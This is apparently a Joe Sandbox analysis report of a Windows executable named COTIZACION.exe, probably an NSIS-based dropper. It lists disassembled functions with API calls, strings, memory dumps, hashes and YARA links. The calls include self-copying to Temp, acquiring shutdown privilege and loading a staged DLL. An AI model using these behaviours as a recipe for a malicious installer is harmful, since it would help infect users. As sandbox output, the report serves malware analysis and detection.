lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\COTIZACION.exe",00000000,00000000), ref: 00403ABB
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\COTIZACION.exe",00000000,00000000), ref: 00403ACA
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\COTIZACION.exe",00000000,00000000), ref: 00403AD9
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B01
DeleteFileW.KERNEL32(0079F200,0079F200,?,007A9000,?), ref: 00403B54
CopyFileW.KERNEL32(C:\Users\user\Desktop\COTIZACION.exe,0079F200,00000001), ref: 00403B66
CloseHandle.KERNEL32(00000000,0079F200,0079F200,?,0079F200,00000000), ref: 00403B9F

Part of subcall function 00405DFC: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
Part of subcall function 00405DFC: GetLastError.KERNEL32 ref: 00405E0E

OleUninitialize.OLE32(00000000), ref: 00403BCD
ExitProcess.KERNEL32 ref: 00403BE4
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BFA
OpenProcessToken.ADVAPI32(00000000), ref: 00403C01
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C16
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C39
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5E

Part of subcall function 004065D4: CharNextW.USER32(?,0040389A,"C:\Users\user\Desktop\COTIZACION.exe",?,"C:\Users\user\Desktop\COTIZACION.exe",00000000), ref: 004065EA

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004036E6
Low, xrefs: 004039CC
C:\Users\user\overlays\besvangredes, xrefs: 0040397E, 00403A6D, 00403B07, 00403B15
~nsu, xrefs: 00403A9C
Error launching installer, xrefs: 00403A4D
C:\Users\user\overlays\besvangredes\Afbetaltes, xrefs: 00403A78
C:\Users\user\Desktop\COTIZACION.exe, xrefs: 00403B61
"C:\Users\user\Desktop\COTIZACION.exe", xrefs: 00403856, 0040388C, 00403894, 00403A22, 00403A2E
NSIS Error, xrefs: 00403840
C:\Users\user\Desktop, xrefs: 00403ACF, 00403B10
1033, xrefs: 00403A00
\Temp, xrefs: 004039B0
SeShutdownPrivilege, xrefs: 00403C10
TMP, xrefs: 004039E6
TEMP, xrefs: 004039DE
C:\Users\user\AppData\Local\Temp\, xrefs: 0040398E, 00403993, 004039A9, 004039B5, 004039C4, 004039D1, 004039DD, 004039E5, 00403AA1, 00403AB6, 00403AC5, 00403AD4, 00403AE7, 00403AFC, 00403BB4
UXTHEME, xrefs: 004037CE, 004037D3, 004037D9
.tmp, xrefs: 00403AC0

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\COTIZACION.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\COTIZACION.exe$C:\Users\user\overlays\besvangredes$C:\Users\user\overlays\besvangredes\Afbetaltes$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 1152188737-1432178247
Opcode ID: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
Instruction ID: ef6c2823884109cd5a884fcd16d1840cc0f2fcd0ed87f9f7bcd5e2f232321f3d
Opcode Fuzzy Hash: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
Instruction Fuzzy Hash: B8D14DB16043106AD7207FB19D45B6B3EECAB4574AF05443FF585B62D2DBBC8A40872E

Function 70022351 Relevance: 18.7, APIs: 12, Instructions: 705stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 700212F8: GlobalAlloc.KERNELBASE(00000040,?,700211C4,-000000A0), ref: 70021302

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 7002294E
lstrcpyW.KERNEL32(00000008,?), ref: 700229A4
lstrcpyW.KERNEL32(00000808,?), ref: 700229AF
GlobalFree.KERNEL32(00000000), ref: 700229C0
GlobalFree.KERNEL32(?), ref: 70022A44
GlobalFree.KERNEL32(?), ref: 70022A4A
GlobalFree.KERNEL32(?), ref: 70022A50
GetModuleHandleW.KERNEL32(00000008), ref: 70022B1A
LoadLibraryW.KERNEL32(00000008), ref: 70022B2B
GetProcAddress.KERNEL32(?,?), ref: 70022B82
lstrlenW.KERNEL32(00000808), ref: 70022B9D

Memory Dump Source

Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 1042148487-0
Opcode ID: 01a9cc7be63b2bf7b2f5ee67372f57986f880b10be9e15ed611c1b68974d87a2
Instruction ID: 2ba2e0282eae7e96d4a0a026fa72561c786d71a78ca349f4d4e9e090fa7addca
Opcode Fuzzy Hash: 01a9cc7be63b2bf7b2f5ee67372f57986f880b10be9e15ed611c1b68974d87a2
Instruction Fuzzy Hash: 5C42D471A08302AFD315CF74E44475EB7F6FF88B22F504A2EE49AD6254D770D9848B92

Function 004066F7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406616: lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
Part of subcall function 00406616: GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B

DeleteFileW.KERNELBASE(?,?,00000000,76F93420,?), ref: 00406723
lstrcatW.KERNEL32(007A3A88,\*.*,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406775
lstrcatW.KERNEL32(?,004082B0,?,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406796
lstrlenW.KERNEL32(?), ref: 00406799
FindFirstFileW.KERNEL32(007A3A88,?), ref: 004067B0
FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00406841
FindClose.KERNEL32(00000000), ref: 00406853

Strings

\*.*, xrefs: 0040676B

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
String ID: \*.*
API String ID: 2636146433-1173974218
Opcode ID: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
Instruction ID: 325cce783f2df783a7673d4e22b29853c472d97363b16a381ac5d63d2c539c61
Opcode Fuzzy Hash: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
Instruction Fuzzy Hash: 2741373210631069D720BB658D05A6B72ACDF92318F16853FF893B21D1EB3C8965C6AF

Function 004065AD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
FindClose.KERNEL32(00000000), ref: 004065C4

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
Instruction ID: 54e165a9d952ab4a9c526d77f24574b80d9b4166436818e4e9d84c3548612847
Opcode Fuzzy Hash: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
Instruction Fuzzy Hash: A5D012315191607FC2501B387F0C84B7A599F65372B114B36B4A6F51E4DA348C628698

Function 00404F70 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAF
ShowWindow.USER32(?), ref: 00404FD9
GetWindowLongW.USER32(?,000000F0), ref: 00404FEA
ShowWindow.USER32(?,00000004), ref: 00405006
GetDlgItem.USER32(?,00000001), ref: 0040512D
GetDlgItem.USER32(?,00000002), ref: 00405137
SetClassLongW.USER32(?,000000F2,?), ref: 00405151
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519F
GetDlgItem.USER32(?,00000003), ref: 0040524E
ShowWindow.USER32(00000000,?), ref: 00405277
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040528B
KiUserCallbackDispatcher.NTDLL(?), ref: 0040529F
EnableWindow.USER32(?), ref: 004052B7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CE
EnableMenuItem.USER32(00000000), ref: 004052D5
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E6
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FD
lstrlenW.KERNEL32(Misspending Setup: Installing,?,Misspending Setup: Installing,00000000), ref: 0040532E

Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,?), ref: 0040604E

SetWindowTextW.USER32(?,Misspending Setup: Installing), ref: 00405346

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

DestroyWindow.USER32(?,00000000), ref: 0040538E
CreateDialogParamW.USER32(?,?,-007A8560), ref: 004053C2

Part of subcall function 004054F8: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405512

GetDlgItem.USER32(?,000003FA), ref: 004053EB
GetWindowRect.USER32(00000000), ref: 004053F2
ScreenToClient.USER32(?,?), ref: 004053FE
SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405417
ShowWindow.USER32(00000008,?,00000000), ref: 00405436

Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

ShowWindow.USER32(?,0000000A), ref: 0040547C

Strings

Misspending Setup: Installing, xrefs: 0040531C, 00405329, 00405340

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
String ID: Misspending Setup: Installing
API String ID: 162979904-1677686103
Opcode ID: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
Instruction ID: 456415ec42eff5e8f6a9a9f0208e2dc106d0a6226250255d67da48920511729f
Opcode Fuzzy Hash: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
Instruction Fuzzy Hash: 38D1C071904B10ABDB20AF21EE44A6B7B68FB89355F00853EF545B21E1CA3D8851CFAD

Function 00405A1C Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 225
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004068C4: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
Part of subcall function 004068C4: GetProcAddress.KERNEL32(00000000), ref: 004068EE

lstrcatW.KERNEL32(1033,Misspending Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Misspending Setup: Installing,00000000,00000002,00000000,76F93420,00000000,76F93170), ref: 00405A9F
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Misspending Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Misspending Setup: Installing,00000000,00000002,00000000), ref: 00405B23
lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Misspending Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Misspending Setup: Installing,00000000), ref: 00405B38
GetFileAttributesW.KERNEL32(Call), ref: 00405B43
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\overlays\besvangredes), ref: 00405B8C

Part of subcall function 004065FD: wsprintfW.USER32 ref: 0040660A

RegisterClassW.USER32(007A74E0), ref: 00405BD1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE8
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1D
ShowWindow.USER32(00000005,00000000), ref: 00405C4F
GetClassInfoW.USER32(00000000,RichEdit20W,007A74E0), ref: 00405C7A
GetClassInfoW.USER32(00000000,RichEdit,007A74E0), ref: 00405C87
RegisterClassW.USER32(007A74E0), ref: 00405C94
DialogBoxParamW.USER32(?,00000000,00404F70,00000000), ref: 00405CAF

Strings

C:\Users\user\overlays\besvangredes, xrefs: 00405AAE, 00405AC0, 00405B5F, 00405B65, 00405B75
RichEd32, xrefs: 00405C63
RichEdit20W, xrefs: 00405C74, 00405C8A
_Nb, xrefs: 00405BB0, 00405C17
.DEFAULT\Control Panel\International, xrefs: 00405A8A
Call, xrefs: 00405AE4, 00405AED, 00405AFE, 00405B52, 00405B58
tz, xrefs: 00405B94
.exe, xrefs: 00405B32
1033, xrefs: 00405A3F, 00405A63, 00405A9A
Misspending Setup: Installing, xrefs: 00405A4F, 00405A5A, 00405A7A, 00405A84, 00405A99
RichEdit, xrefs: 00405C81
RichEd20, xrefs: 00405C55
Control Panel\Desktop\ResourceLocale, xrefs: 00405A5C

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\overlays\besvangredes$Call$Control Panel\Desktop\ResourceLocale$Misspending Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$tz
API String ID: 1975747703-1876227926
Opcode ID: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
Instruction ID: 09b92c81f8f4ef2e2e9fd8d830fcc712f1cdd6db1c368b512ccdb95b409c048d
Opcode Fuzzy Hash: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
Instruction Fuzzy Hash: 31611370604604BEE7107B65AD42F2B366CEB46748F11813EF941B61E2EB3CA9108FAD

Function 0040154A Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 441
stringtimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 004015F1
Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
SetForegroundWindow.USER32 ref: 00401634
ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\overlays\besvangredes\Afbetaltes,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,00000000,000000F0,?,?,00000000,00000000), ref: 004017A3
MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\overlays\besvangredes\Afbetaltes,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\overlays\besvangredes\Afbetaltes,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
SetFileTime.KERNELBASE(?,?,00000000,?,?,?,00000000,00000000,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A5A
CloseHandle.KERNELBASE(?,?,?,00000000,00000000), ref: 00401A61
lstrcatW.KERNEL32(Call,?,Call,000000E9,?,?,00000000,00000000), ref: 00401A82

Strings

C:\Users\user\overlays\besvangredes\Afbetaltes, xrefs: 00401798, 0040190E
C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll, xrefs: 00401789, 004017F8, 00401823, 004019B1, 004019D2
C:\Users\user\AppData\Local\Temp\nszA7D1.tmp, xrefs: 00401998, 004019BB
Call, xrefs: 004018FC, 00401906, 00401913, 00401925, 00401933, 00401968, 0040197C, 004019A2, 004019EA, 00401A7A, 00401A81, 00401A8B, 00401A96

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
String ID: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp$C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll$C:\Users\user\overlays\besvangredes\Afbetaltes$Call
API String ID: 3895412863-917698584
Opcode ID: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
Instruction ID: f97e61f8377ab9e25a0dd965f2557d34b91b3991d6c9f65f1b163fc05bb86adc
Opcode Fuzzy Hash: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
Instruction Fuzzy Hash: 6AD1D571644301ABC710BF66CD85E2B76A8AF86758F10463FF452B22E1DB7CD8019A6F

Function 004033CB Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033DE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\COTIZACION.exe,00000400), ref: 004033FA

Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\COTIZACION.exe,80000000,00000003), ref: 004068FD
Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\COTIZACION.exe,C:\Users\user\Desktop\COTIZACION.exe,80000000,00000003), ref: 00403444
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040359E

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033D1
Error launching installer, xrefs: 0040341A
C:\Users\user\Desktop, xrefs: 00403425, 0040342A, 00403430
Null, xrefs: 004034CC
Inst, xrefs: 004034B8
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040361E
C:\Users\user\Desktop\COTIZACION.exe, xrefs: 004033E9, 004033F3, 00403407, 00403424
soft, xrefs: 004034C2

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
